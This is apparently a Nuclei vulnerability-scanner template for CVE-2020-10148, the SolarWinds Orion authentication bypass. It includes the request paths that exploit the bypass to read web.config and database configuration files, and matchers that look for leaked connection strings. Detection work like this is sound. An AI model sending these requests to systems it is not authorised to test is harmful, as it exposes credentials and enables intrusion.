id: CVE-2020-10148 info: name: SolarWinds Orion API Auth Bypass Leads to RCE (SUPERNOVA) author: dwisiswant0 severity: critical description: | This template could allow to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. reference: - https://kb.cert.org/vuls/id/843464 - https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/solarwinds-lfi-cve-2020-10148.yaml - https://gist.github.com/0xsha/75616ef6f24067c4fb5b320c5dfa4965 - https://twitter.com/0xsha/status/1343800953946787847 tags: cve,cve2020,solarwinds,rce,auth,bypass classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2020-10148 cwe-id: CWE-287 requests: - method: GET path: - "{{BaseURL}}/web.config.i18n.ashx?l=nuclei&v=nuclei" - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei" stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - "SolarWinds.Orion.Core." - "Connection String" condition: or - type: word part: header words: - "text/plain" - type: status status: - 200